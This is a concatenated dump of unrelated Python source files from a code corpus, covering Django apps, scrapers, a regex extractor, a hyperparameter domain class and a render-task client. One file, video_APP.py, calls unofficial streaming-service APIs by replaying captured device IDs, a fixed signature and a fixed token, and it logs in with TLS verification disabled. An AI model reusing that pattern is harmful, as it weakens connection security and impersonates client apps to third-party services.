ri_scope_fp=None\n):\n try:\n # Prepare the target directory and copy the source files, profiles and\n # model version file into it\n target_dir = as_path(target_dir, 'target Oasis files directory', is_dir=True, 
preexists=False)\n if not os.path.exists(target_dir):\n Path(target_dir).mkdir(parents=True, exist_ok=True)\n\n paths = [p for p in (\n exposure_fp, exposure_profile_fp, accounts_fp, accounts_profile_fp,\n fm_aggregation_profile_fp, lookup_config_fp, model_version_fp,\n keys_fp, ri_info_fp, ri_scope_fp\n )\n if p\n ]\n for src in paths:\n if src and os.path.exists(src):\n dst = os.path.join(target_dir, os.path.basename(src))\n shutil.copy2(src, target_dir) if not (os.path.exists(dst) and filecmp.cmp(src, dst, shallow=False)) else None\n except (FileNotFoundError, IOError, OSError, shutil.Error, TypeError, ValueError) as e:\n raise OasisException(e)\n\n return target_dir\n","sub_path":"oasislmf/model_preparation/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"386184839","text":"#!/usr/bin/env python3\n\n#https://codeforces.com/problemset/problem/766/B\n\ndef maket(l):\n l.sort()\n for i in range(len(l)-2): #not limit to 4 case\n if l[i]+l[i+1]>l[i+2]:\n return 'YES'\n return 'NO'\n\n_ = input()\nl = list(map(int,input().split()))\nprint(maket(l))\n","sub_path":"codeforces/geometry计算几何/1000/766B搭三角形.py","file_name":"766B搭三角形.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"649672266","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('auth', '0006_require_contenttypes_0002'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='User',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('password', models.CharField(verbose_name='password', max_length=128)),\n ('last_login', models.DateTimeField(null=True, verbose_name='last login', blank=True)),\n ('is_superuser', models.BooleanField(verbose_name='superuser status', default=False, help_text='Designates that this user has all permissions without explicitly assigning them.')),\n ('email', models.TextField(db_index=True, unique=True)),\n ('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.')),\n ('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.')),\n ('created_at', models.DateTimeField(default=datetime.datetime.now)),\n ('groups', models.ManyToManyField(blank=True, related_name='user_set', help_text='The groups this user belongs to. 
A user will get all permissions granted to each of their groups.', verbose_name='groups', related_query_name='user', to='auth.Group')),\n ('user_permissions', models.ManyToManyField(blank=True, related_name='user_set', help_text='Specific permissions for this user.', verbose_name='user permissions', related_query_name='user', to='auth.Permission')),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='Proposal',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('abstract', models.TextField()),\n ('title', models.TextField()),\n ('created_at', models.DateTimeField(default=datetime.datetime.now)),\n ],\n ),\n migrations.CreateModel(\n name='Vote',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('created_at', models.DateTimeField(default=datetime.datetime.now)),\n ('is_interested', models.BooleanField(default=True)),\n ('proposal', models.ForeignKey(to='voting.Proposal')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n","sub_path":"voting/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"341844578","text":"# -*- encoding=utf-8 -*-\nimport time, requests, json\n\n\nclass bobotv():\n\n def __init__(self,urls,headers,paras):\n self.urls=urls\n self.headers=headers\n self.paras=paras\n\n def search(self,kw,type):\n para=self.paras['search']\n para['Title']=kw\n para['Type']=type\n req=requests.get(self.urls['search'],params=para,headers=self.headers['search'])\n #req.encoding = 'json'\n c=json.loads(req.text)\n return self.prase(c)\n\n def prase(self,content):\n\n res = {}\n for item in content['searchlist']:\n code = item['code']\n title = item['title']\n leixin = item['mainFolder']\n actors = item['actors']\n year = item['year']\n datalink = item['dataLink']\n\n res[code] = [title, actors,leixin,year, datalink]\n return res\n\n\n def update_head(self):\n req = requests.get(self.urls['head'], params=self.paras['head'], headers=self.headers['head'])\n content = json.loads(req.text)\n res = ''\n\n for item in content['areaDatas'][1]['items']:\n text = ''.join([time.strftime('%Y-%m-%d'), u'~播播TV~', item['itemTitle'],item['itemSubTitle']])\n res += text + '\\n'\n return res\n\n def update_video(self,url):\n\n req = requests.get(url, headers=self.headers['play'])\n content = json.loads(req.text)\n\n if content.get('episodes'):\n text = ''.join([time.strftime('%Y-%m-%d'), u'~播播TV~',str(len(content['episodes'])), '~', content['series']['episodenum']])\n else:\n text = ''.join([time.strftime('%Y-%m-%d'), u'~播播TV~',content['albumitem'][0]['title']])\n return text\n\n\nclass bestv():\n import uuid\n\n def __init__(self,urls,headers,paras):\n self.urls=urls\n self.headers=headers\n self.paras=paras\n\n def search(self,kw):\n para=self.paras['search']\n para['k']=kw\n req=requests.get(self.urls['search'],params=para,headers=self.headers['search'])\n c=json.loads(req.text)\n\n status=c['code']\n\n return self.prase(status,c)\n\n def prase(self,status,content):\n\n res = {}\n if status == 0:\n for item in content['dataMap']['result']:\n code = item['code']\n vid = item['id']\n title = item['title']\n typ = item['cateName']\n actors = item['actors']\n year = item['pubdate']\n fdncode = item['fdncode']\n\n res[code] = [title,actors,typ, year, vid, fdncode]\n return res\n 
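# an empty status code appears to signal a rejected/expired token (assumption, see message below)\n        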
elif status=='':\n return 'invaild token'\n\n\n def update_head(self):\n req = requests.get(self.urls['head'], params=self.paras['head'], headers=self.headers['head'])\n content = json.loads(req.text)\n res = ''\n for item in content['data']['banner']:\n text = ''.join([time.strftime('%Y-%m-%d'),u'~百视通~', item['title']])\n res += text + '\\n'\n return res\n\n def update_video(self,vid):\n para = self.paras['play']\n para['vid'] = vid\n if len(vid)>5:\n req = requests.get(self.urls['play'], params=para, headers=self.headers['play'])\n content = json.loads(req.text)\n text = ''.join([time.strftime('%Y-%m-%d'), u'~百视通~',str(content['data']['epCnt']), '~', str(content['data']['epTotal'])])\n else:\n url='https://bestvapi.bestv.cn/api/program_list?app=default&cid=%s&p=1&len=20'%vid\n req = requests.get(url, headers=self.headers['play'])\n content = json.loads(req.text)\n last=content['list'][0]\n text = ''.join([time.strftime('%Y-%m-%d'), u'~百视通~',last['title']])\n\n return text\n\n\n def update_token(self):\n\n para={'anm':'BesTV',\n 'app':'ios',\n 'bn':'Apple',\n 'channelid':'cd151695-a8cb-408d-a1b0-ab61556ce5a5',\n 'os':'ios11.4',\n 'rs':'640x1136',\n 'ut':'idfa',\n 'idfa':'30FF8D7D-B625-4803-AA06-432DE9E9EABC',\n 'net':'wifi',\n 'mnc':'00',\n 'pnm':'com.bestv.app.BesTV',\n 'lt':'1',\n 'lct':'31.174850,121.406448',\n 'timestamp':'1533784274',\n 'ua':'Mozilla/5.0(iPhone;CPUiPhoneOS11_3likeMacOSX)AppleWebKit/605.1.15(KHTML,likeGecko)Mobile/15E216',\n 'signature':'1403bfc4a49e8d1028558a0c742874db9e9ee492a5a9c3d5996ba98bc1e91605',}\n\n # post_url='https://bestvapi.bestv.cn/app/init?anm=BesTV&app=ios&bn=Apple&channelid=cd151695-a8cb-408d-a1b0-ab61556ce5a5&idfa=31AED55C-9969-41DC-ADA7-2CDE39BEF190&lct=31.174850,121.406448<=1&mn=iPhone6,1&mnc=00&net=wifi&os=ios11.4&pnm=com.bestv.app.BesTV&rs=640x1136&ua=Mozilla/5.0(iPhone;CPUiPhoneOS11_3likeMacOSX)AppleWebKit/605.1.15(KHTML,likeGecko)Mobile/15E216&ut=idfa&signature=8b5002403baed5e5439b5bed93ff1c04f2c8407d525b643b348be2c5ae248092'\n # post_url='https://bestvapi.bestv.cn/app/refresh?anm=BesTV&app=ios&bn=Apple&channelid=cd151695-a8cb-408d-a1b0-ab61556ce5a5&idfa=30FF8D7D-B625-4803-AA06-432DE9E9EABC&lct=31.174850,121.406448<=1&mn=iPhone6,1&mnc=00&net=wifi&os=ios11.4&pnm=com.bestv.app.BesTV&rs=640x1136×tamp=1533783029&ua=Mozilla/5.0(iPhone;CPUiPhoneOS11_3likeMacOSX)AppleWebKit/605.1.15(KHTML,likeGecko)Mobile/15E216&ut=idfa&signature=bb2718a21e9021fe4c2bfe59692aa039f0e9a073fc531f912aecc66d661c7200'\n post_url = 'https://bestvapi.bestv.cn/app/init?'\n para['timestamp']=str(int(time.time()))\n para['signature']='1403bfc4a49e8d1028558a0c742874db9e9ee492a5a9c3d5996ba98bc1e91605'\n\n print(para['signature'])\n data={\"device_id\":\"iPhone6,1_0_30FF8D7D-B625-4803-AA06-432DE9E9EABC\"}\n resp=requests.post(post_url,headers=self.headers['head'],params=para,data=data)\n content = json.loads(resp.text)\n return content\n\n\nclass iQIYI():\n\n def __init__(self, urls, headers, paras):\n self.urls = urls\n self.headers = headers\n self.paras = paras\n\n def search(self, kw):\n para = self.paras['search']\n para['keyword'] = kw\n\n req = requests.get(self.urls['search'], params=para, headers=self.headers['search'])\n c = json.loads(req.text)\n\n return self.prase(c)\n\n def prase(self, content):\n res = {}\n for item in content['cards']:\n cate={'tv_album':u'电视剧','film':u'电影','variety_show_album':u'综艺'}\n if item['name'] in cate:\n source = item['items'][0]['click_event']['statistics']['siteId']\n if source=='iqiyi':\n code = item['items'][0]['_id']\n title = 
item['items'][0]['meta'][0]['text'].replace('<','').replace('>','')\n try:actor = item['items'][0]['meta'][2]['text']\n except:actor=''\n category=cate[item['name']]\n #year=item['items'][0]['meta'][1]['text']\n vip = item['items'][0]['click_event']['data']['load_img']\n\n res[code] = [title, actor, category, vip,]\n\n return res\n\n\nclass iTV():\n\n def __init__(self,urls,headers,paras):\n self.urls=urls\n self.headers=headers\n self.paras=paras\n\n def search(self,kw):\n para=self.paras['search']\n para['title']=kw\n req=requests.get(self.urls['search'],params=para,headers=self.headers['search'])\n if req.text!='invalid token !':\n c=json.loads(req.text)\n return self.prase(c)\n else:\n print(req.text)\n new_host=self.update_token()[0]\n new_token=self.update_token()[1]\n\n self.urls['search']='http://'+new_host+'/epgs/yoongoo/media/search?'\n self.paras['search']['token']=new_token\n return self.search(kw)\n\n def prase(self,content):\n res = {}\n for item in content['list']:\n columnId = item['columnId']\n columns={2:u'电影',3:u'电视剧',4:u'综艺'}\n cate =columns.get(columnId) or item['category']\n if item.get('copyright'):\n copyright = item['copyright']\n if 'phone' in copyright:\n code = item['id']\n title = item['title']\n actor = item['actor']\n vip = item['isPay']\n totalSerial = item['totalSerial']\n\n res[code] = [title, actor, cate,columnId,code,vip, copyright, totalSerial]\n return res\n\n\n\n def update_head(self):\n req = requests.get(self.urls['head'], params=self.paras['head'], headers=self.headers['head'])\n content = json.loads(req.text)\n res = ''\n\n for item in content[0]['rcmb'][0]['items']:\n title=item.get('tVTitle')\n if not title:\n title=item.get('title','error')\n text = ''.join([time.strftime('%Y-%m-%d'),u'~安徽iTV~', title])\n res += text + '\\n'\n\n return res\n\n def update_video(self,vid,typeid):\n para = self.paras['play']\n para['id'] = vid\n para['columnid']=typeid\n\n req = requests.get(self.urls['play'], params=para, headers=self.headers['play'])\n content = json.loads(req.text)\n text=''\n if typeid=='3':\n text = ''.join([time.strftime('%Y-%m-%d'), u'~安徽iTV~' ,str(content['totalcount']), '~', str(content['totalSerial'])])\n elif typeid == '4':\n text = ''.join([time.strftime('%Y-%m-%d'), u'~安徽iTV~', content['urls'][-1]['title'], '~', str(content['totalcount'])])\n else:\n pass\n\n return text\n\n def update_token(self):\n\n post_header = {'User-Agent': 'BrightenVideo/1805150936 CFNetwork/897.15 Darwin/17.5.0',\n 'Host': '117.71.39.12:5001',\n 'Accept-Language': 'zh',\n 'Accept-Encoding': 'br, gzip, deflate',\n 'Content-Length': '574',\n 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',\n 'Connection': 'keep-alive',\n 'Accept': '*/*', }\n post_url = 'https://117.71.39.12:5001/ois/user/login'\n XML = ''''''\n\n resp = requests.post(post_url, headers=post_header, data=XML, verify=False)\n\n return resp.headers['EPGS-Token']\n\n\nclass UHD():\n\n def __init__(self,urls,headers,paras):\n self.urls=urls\n self.headers=headers\n self.paras=paras\n\n def search(self,kw):\n para=self.paras['search']\n para['title']=kw\n req=requests.get(self.urls['search'],params=para,headers=self.headers['search'])\n\n if req.text!='invalid token !':\n c=json.loads(req.text)\n return self.prase(c)\n else:\n print(req.text)\n new_host=self.update_token()[0]\n new_token=self.update_token()[1]\n\n self.urls['search']='http://'+new_host+'/epgs/UHD/media/get?'\n self.paras['search']['token']=new_token\n return self.search(kw)\n\n def prase(self,content):\n res = {}\n 
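# flatten each media entry into {id: [title, actor, category, ...]} rows\n        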
for item in content['list']:\n columnId = item['columnId']\n columns = {2: u'电影', 3: u'电视剧', 4: u'综艺'}\n # if columnId in columns:\n cate = columns.get(columnId) or item['category']\n copyright = item['copyright']\n code = item['id']\n title = item['title']\n actor = item['actor']\n vip = item['isPay']\n totalSerial = item['totalSerial']\n categoryList=item.get('categoryList')\n if categoryList:\n categoryID=categoryList[0]['id']\n else:\n categoryID='null'\n\n res[code] = [title, actor, cate,columnId, code,vip, copyright, totalSerial,categoryID]\n return res\n\n\n\n def update_head(self):\n req = requests.get(self.urls['head'], params=self.paras['head'], headers=self.headers['head'])\n content = json.loads(req.text)\n res = ''\n\n for item in content['0'][1]['rcmbItems']:\n text = ''.join([time.strftime('%Y-%m-%d'),u'~新疆UHD~', item['title'],item['subtitle']])\n res += text + '\\n'\n\n return res\n\n def update_video(self,vid,typeid):\n para = self.paras['play']\n para['id'] = vid\n para['columnid']=typeid\n if typeid=='3':\n req = requests.get(self.urls['play'], params=para, headers=self.headers['play'])\n req.encoding = 'utf-8'\n content = json.loads(req.text)\n text = ''.join([time.strftime('%Y-%m-%d'), u'新疆~UHD~' ,str(content['curSerial']), '~', str(content['totalSerial'])])\n else:\n url='http://202.107.188.243:8080/epgs/UHD/media/get?columnid=%s&pageindex=0&pagesize=48&lang=zh&token=guoziyun&category=%s&sort=sort'%(typeid,vid)\n req = requests.get(url, headers=self.headers['play'])\n req.encoding = 'utf-8'\n content = json.loads(req.text)\n text = ''.join([time.strftime('%Y-%m-%d'), u'~新疆UHD~', content['list'][0]['title']])\n\n return text\n\n def update_token(self):\n\n post_header = {'User-Agent': 'BrightenVideo/1805102147 CFNetwork/901.1 Darwin/17.6.0',\n 'Host': '202.107.188.228:5001',\n 'Accept-Language': 'zh-cn',\n 'Accept-Encoding': 'br, gzip, deflate',\n 'Content-Length': '612',\n 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',\n 'Connection': 'keep-alive',\n 'Accept': '*/*', }\n\n post_url = 'https://202.107.188.228:5001/ois/user/login'\n\n XML = ''''''\n\n resp = requests.post(post_url, headers=post_header, data=XML, verify=False)\n\n host=resp.headers['EPGS']\n token=resp.headers['EPGS-Token']\n\n return (host,token)\n\n\nclass HuNan_TV():\n import uuid\n def __init__(self, urls, headers, paras):\n self.urls = urls\n self.headers = headers\n self.paras = paras\n\n def search(self, kw,cate):\n category={'电视剧':'T_C81E728','电影':'T_C4CA423','综艺':'T_ECCBC87'}\n para = self.paras['search']\n para['words'] = kw\n\n para['timestamp']=str(int(time.time()))\n para['token']=str(self.uuid.uuid4()).replace('-','')\n req = requests.post(self.urls['search'], params=para, headers=self.headers['search'])\n c = json.loads(req.text)\n dict1 = self.prase(c)\n\n time.sleep(2)\n\n para['typeCode']=category.get(cate)\n if para['typeCode']:\n req=requests.post(self.urls['search'], params=para, headers=self.headers['search'])\n c = json.loads(req.text)\n dict2 = self.prase(c)\n\n return dict(dict1.items()+dict2.items())\n return dict1\n\n def prase(self, content):\n res = {}\n if content.get('Data'):\n for item in content['Data']:\n copyright=item['JumpData']['isThrow']\n if copyright==0:\n code = item['JumpData']['assetId']\n title = item['JumpData']['clipName']\n actor = item['JumpData']['director'] #leader 8月字段错乱,演员在director字段下,本来应在leader下\n category=item['JumpData']['typeName']\n year=item['JumpData']['year']\n left=item['TagInfo'].get('leftTag')\n 
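# corner badge tags of the poster (e.g. VIP markers, an assumption); .get() tolerates entries without badges\n                    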
right=item['TagInfo'].get('rightTag')\n\n res[code] = [title, actor, category, year,left,right,code]#vip, curSerial,playID]\n return res\n\n def update_head(self):\n timestamp=str(int(time.time()))\n token=str(self.uuid.uuid4()).replace('-', '')\n u0='http://api2.iptv.leso114.com:8080/api3/layout/getTemplateByLayoutCode?key=bLdNEYOkt7Ke8zb%252FE%252FU6ZfPqOQB2lPjTaG7THNx8WiyNFyd6X0a%252FLOgnnPmTuCxLw0J0EOggdScKyPFhyuNCXJAvXt2ZgYDJYPMYvGj8SohJfWVgSzwz%252FLeBjZRkQCKd1tiIyN19yr%252FSzFndzXT5yW27fNUYeH3KicvsWmWCEBw%253D&layoutCode=iptvHome×tamp='+timestamp+'&token='+token\n req0 = requests.post(u0, headers=self.headers['head'])\n c=json.loads(req0.text)\n\n para=self.paras['head']\n para['templateCode']=c['Data'][0]['templateCode']\n para['timestamp'] = timestamp\n para['token'] = str(self.uuid.uuid4()).replace('-', '')\n req = requests.post(self.urls['head'], params=para, headers=self.headers['head'])\n content = json.loads(req.text)\n res = ''\n for item in content['Data']:\n\n text = ''.join([time.strftime('%Y-%m-%d'),u'~湖南IPTV~', item['DisInfo']['title'],item['DisInfo']['subTitle']])\n res += text + '\\n'\n\n return res\n\n def update_video(self, assid):\n para = self.paras['play']\n para['assetId'] = assid\n para['timestamp'] = str(int(time.time()))\n para['token'] = str(self.uuid.uuid4()).replace('-', '')\n\n req = requests.get(self.urls['play'], params=para, headers=self.headers['play'])\n\n content = json.loads(req.text)\n last=content['Data'][0]['JumpData']['PartList'][-1]\n first=content['Data'][0]['JumpData']['PartList'][0]\n\n text = ''.join([time.strftime('%Y-%m-%d'), u'~湖南IPTV~', last['partName'],'@',str(last['serialNum']),'|',first['partName'],'@',str(first['serialNum'])])\n\n return text\n\n\n__all__ = ['bobotv', 'bestv']\n'''\nif __name__ == '__main__':\n best = bestv(paras.urls_bestv, paras.headers_bestv, paras.paras_bestv)\n print(best.update_token())\n'''","sub_path":"Proj_App/VideoSite/video_APP.py","file_name":"video_APP.py","file_ext":"py","file_size_in_byte":18946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"96271327","text":"\"\"\"\nDefine the domain space abstractions for the Optimizer\n\"\"\"\n\n# this is used to check whether the domain space object is a of type rv_frozen.\n# if the parameter type is a disribution or rv_frozen, the parameter sampler can handle it\nfrom scipy.stats._distn_infrastructure import rv_frozen\nimport numpy as np\nfrom sklearn.model_selection import ParameterSampler\n\n\n\n\nclass domain_space():\n\n \"\"\"\n initializer\n 1) We expect a parameter dictionary as an input from which we will creating a mapping.\n 2) The mapping is storing the categorical variables or discrete variables along with the discrete possible values\n 3) The categorical variables are handeled as one hot encoding values\n \"\"\"\n def __init__(self,\n param_dict,\n domain_size):\n self.param_dict = param_dict\n\n #creating a mapping of categorical variables\n self.create_mappings()\n\n #print('mapping_categorical')\n #print(self.mapping_categorical)\n\n #print('mapping_int')\n #print(self.mapping_int)\n\n #the domain size to explore using the parameter sampler\n self.domain_size = domain_size\n\n\n \"\"\"\n returns the list of domain values using the parameter sampler\n The size of values is the domain_size\n \"\"\"\n def get_domain(self):\n domain_list = list(ParameterSampler(self.param_dict, n_iter=self.domain_size))\n return domain_list\n\n \"\"\"\n return a random sample using the ParameterSample\n 
\"\"\"\n def get_random_sample(self,size):\n domain_list = list(ParameterSampler(self.param_dict, n_iter=size))\n return domain_list\n\n \"\"\"\n Categorical values/discrete values are considered from the list of each value being str\n\n We will finally do one-hot-encoding of the list values.\n Here we will keep some book-keeping information, like number of different values\n and the mapping of each\n\n Integer values are considered from list of each value as int or from a range\n \"\"\"\n def create_mappings(self):\n mapping_categorical = dict()\n mapping_int = dict()\n\n param_dict = self.param_dict\n for par in param_dict:\n if isinstance(param_dict[par], rv_frozen):\n pass # we are not doing anything at present, and will directly use its value for GP.\n\n elif isinstance(param_dict[par],range):\n mapping_int[par] = param_dict[par]\n\n elif isinstance(param_dict[par],list):\n\n #for list with values of string, we are considering categorical or discrete\n if all(isinstance(x, str) for x in param_dict[par]):\n mapping_categorical[par] = param_dict[par]\n\n #for list with all int, we are considering it as a int\n elif all(isinstance(x, int) for x in param_dict[par]):\n mapping_int[par] = param_dict[par]\n\n self.mapping_categorical = mapping_categorical\n self.mapping_int = mapping_int\n\n\n\n \"\"\"\n convert the hyperparameters from the param_dict space to the GP space, by converting the\n categorical variables to one hotencoded, and return a numpy array which can be used to train the GP\n\n input is the domain_list generated using the Parameter Sampler.\n \"\"\"\n def convert_GP_space(self,\n domain_list):\n mapping_categorical = self.mapping_categorical\n\n X =[]\n for domain in domain_list:\n curr_x = []\n #for x in domain:\n for x in sorted (domain.keys()):\n #this value can be directly used, for int too, we will consider it as a float for GP\n if x not in mapping_categorical:\n curr_x.append(domain[x])\n\n #this is a categorical variable which require special handling\n elif x in mapping_categorical:\n\n size = len(mapping_categorical[x]) # total number of categories.\n\n # we need to see the index where: domain[x] appears in mapping[x]\n index = mapping_categorical[x].index(domain[x])\n\n listofzeros = [0.0] * size\n\n\n # We will set the value to one for one hot encoding\n listofzeros[index] = 1.0\n\n #expanding current list\n curr_x = curr_x + listofzeros\n\n X.append(curr_x)\n\n X = np.array(X)\n\n return X\n\n\n \"\"\"\n Convert from the X_gp space which is a numpy array that can be given input to the gaussian process\n to the parameter sampler space which is a list of the dict\n\n We have to reverse the one-hotencoded transformation of the categories to the category name\n \"\"\"\n def convert_PS_space(self,\n X_gp):\n X_ps = []\n\n mapping_categorical = self.mapping_categorical\n mapping_int = self.mapping_int\n param_dict = self.param_dict\n\n\n for i in range(X_gp.shape[0]):\n\n curr_x_gp = X_gp[i]\n #we will create a list of dict, same as parameter samplers\n curr_x_ps = dict()\n\n\n index = 0\n\n #every sample is from the param_dict\n\n for par in sorted (param_dict.keys()):\n #for par in param_dict:\n #print('par is:',par)\n\n #this has to have integer values\n if par in mapping_int:\n curr_x_ps[par] = int(curr_x_gp[index])\n index = index+1\n\n #this par is a categorical variable and we need to handle it carefully\n elif par in mapping_categorical:\n size = len(mapping_categorical[par]) # total number of categories.\n\n one_hot_encoded = curr_x_gp[index:index+size]\n 
category_type = np.argmax(one_hot_encoded)\n\n category_type = mapping_categorical[par][category_type]\n\n curr_x_ps[par] = category_type\n\n # we have processed the entire one-hotencoded\n index = index+size\n\n #this is a float value\n else:\n curr_x_ps[par] = curr_x_gp[index]\n index = index+1\n\n X_ps.append(curr_x_ps)\n\n return X_ps\n","sub_path":"mango/domain/domain_space.py","file_name":"domain_space.py","file_ext":"py","file_size_in_byte":6304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"653544762","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.main),\n path(\"main\", views.main),\n path(\"register_user\", views.register_user),\n path(\"login_user\", views.login_user),\n path(\"travels\", views.show_trips),\n path(\"travels/join/\", views.join_trip),\n path(\"travels/destination/\", views.show_destination),\n path(\"travels/add\", views.add_trip),\n path(\"logout\", views.logout)\n]","sub_path":"apps/travel_plans/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"542493780","text":"from bs4 import BeautifulSoup\nfrom urllib.request import urlopen, Request\n\nreq = Request(\"https://realpython.com/practice/profiles.html\", headers={\"User-Agent\": \"Mozilla/5.0\"})\nhtml_page = urlopen(req)\nhtml_text = html_page.read().decode('utf-8')\nmy_soup = BeautifulSoup(html_text, features=\"html.parser\")\n\nfor tag in my_soup.find_all(\"a\"):\n url = \"https://realpython.com/practice/\" + tag['href']\n req = Request(url, headers={\"User-Agent\":\"Mozilla/5.0\"})\n html_page = urlopen(req)\n html_text = html_page.read().decode('utf-8')\n my_soup = BeautifulSoup(html_text, features=\"html.parser\")\n print(my_soup.get_text())","sub_path":"part6/BS_review.py","file_name":"BS_review.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"307661130","text":"##\n## Imprima la cantidad de registros por letra para la \n## primera columna, ordenados alfabeticamente.\n##\n## A,8\n## B,7\n## C,5\n## D,6\n## E,14\n##\ntxt = open('data.csv','r').readlines()\ntxt = [row[0:-1]for row in txt]\ntxt = [line.replace('\\t','')for line in txt]\nc = sorted(set([row[0]for row in txt]))\ns = [row[0]for row in txt]\naa =0\nfor i in c:\n aa = s.count(i)\n print(i+','+str(aa))\n \n","sub_path":"q02.py","file_name":"q02.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"569613316","text":"import re\r\nEOF = ''\r\n# Read the file as a text\r\n\r\nf = open(r\"C:\\Users\\Purushotham\\Desktop\\oracle\\day_05\\regex_ex\\resume.txt\", \"r\")\r\ncontent = f.read()\r\nf.close()\r\n# Patterns\r\n\r\njobid = r'#\\d{6}'\r\nemail = r\"(\\w+[.-_]){,3}\\w+@\\w+\\.(com|org|in)\" # raj.kumar.avss.009@gmail.com, raj.kumar.009#gmail, raj.kumar@gmail.com, raj@gmail.com\r\nphone = r\"\\d{3}-?\\d{3}-?\\d{4}\"\r\nlinkedin = r\"(linkedin.com)/\\w+/(\\w+[-_.]){,5}\\w+\"\r\nname = r\"(Sincerely,?)\\n+(?P\\w+\\s\\w+)\"\r\n\r\nipaddr = r\"([0-9]{1,3}\\.){3}[0-9]{1,3}\" # Deepika\r\nexperience = r\"(?P[0-9]{,2}\\+\\s(years?|months?))[\\w\\s]*(experience)\"\r\n\r\n# Apply the patterns and store what ever is extracted\r\n\r\n\r\n\r\nm = re.search(jobid, content)\r\nif m:\r\n print('JOBID : ', m.group())\r\n\r\nm = re.search(email, 
content)\r\nif m:\r\n print('EMAIL : ', m.group())\r\n\r\nm = re.search(phone, content)\r\nif m:\r\n print('PHONE : ', m.group())\r\n\r\nm = re.search(linkedin, content)\r\nif m:\r\n print('LINKEDIN : ', m.group())\r\n\r\nm = re.search(name, content)\r\nif m:\r\n print('NAME : ', m.groupdict()['Name'])\r\n\r\nm = re.search(experience, content)\r\nif m:\r\n print('EXPERIENCE : ', m.groupdict()['experience'])\r\n\r\nm = re.search(ipaddr, content)\r\nif m:\r\n print('IP ADDRESS : ', m.group())","sub_path":"day_04/regex_ex/extract_details.py","file_name":"extract_details.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"256692159","text":"# -*- coding: utf-8 -*-\nimport socket, time, struct, random\n\nINVALIDE_ID = 0\n\n#type task type, e.g. render_task_type.tasktype_houdini_proj\n#Priority priority\n#StartFrame first frame number\n#EndFrame last frame number\n#Step frame step, default 1\n#TaskName task name \n#RenderName name of the render software\n#InputPath input directory path; for a hip file, the absolute path of the hip file\n#InputFileName prefix of the generated files\n#OutputPath output directory path, empty by default\n#Misc for a hip file, the renderer path; empty by default\n#Server render server address, default 172.16.252.47\n#Port render server port, default 44331\ndef onAddTask(type, Priority, TaskName, RenderName, StartFrame, EndFrame, Step=1, InputPath='', InputFileName='', OutputPath='', Misc='', Server='172.16.252.47', Port=44331):\n AddTime = int(time.time())\n RenderStartTime = 0\n RenderStopTime = 0\n id = 4294967295 - random.randrange(1000000 - 1)\n FrameCount = EndFrame - StartFrame + 1\n\n sockobj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sockobj.connect((Server, Port))\n sockname = sockobj.getsockname()\n OwnerIpv4Addr = struct.unpack(\"!I\", socket.inet_aton(sockname[0]))[0]\n\n cmd_data = rencmd_mux_add_task_cmd_data(id,\n type,\n OwnerIpv4Addr,\n Priority,\n StartFrame,\n FrameCount,\n Step,\n AddTime,\n RenderStartTime,\n RenderStopTime,\n TaskName,\n RenderName,\n InputPath,\n InputFileName,\n OutputPath,\n Misc)\n\n cmd = rencmd_mux_cmd(devtypes.devtype_workstation,\n cmdids.cmd_render_task,\n INVALIDE_ID,\n OwnerIpv4Addr,\n cmd_data,\n None)\n \n sockobj.send(cmd)\n sockobj.close()\n return True\n\nclass render_name:\n ifd = 'houdini ifd render'\n hip = 'houdini project render'\n simulation = 'houdini simulation render'\n\nclass render_task_type:\n tasktype_ifd = 0\n tasktype_houdini_proj = 1\n tasktype_maya_proj = 3\n tasktype_simulation = 4\n tasktype_houdini_proj_derived = 5\n\n\nclass devtypes:\n devtype_schedule_svr = 0\n devtype_render_node = 1\n devtype_admin_tool = 2\n devtype_workstation = 3\n\n\nclass cmdidsEnum:\n __cmdids_num = 0\n def get_enum_num(self):\n cur = self.__cmdids_num\n self.__cmdids_num = self.__cmdids_num + 1\n return cur\n \nclass cmdids:\n enum = cmdidsEnum()\n cmd_node_register = enum.get_enum_num()\n cmd_response_node_register = enum.get_enum_num()\n cmd_login = enum.get_enum_num()\n cmd_response_login = enum.get_enum_num()\n cmd_node_is_busy = enum.get_enum_num()\n cmd_new_node = enum.get_enum_num()\n cmd_render_log = enum.get_enum_num()\n cmd_sub_render_successed = enum.get_enum_num()\n cmd_render_successed = enum.get_enum_num()\n cmd_render_nodes = 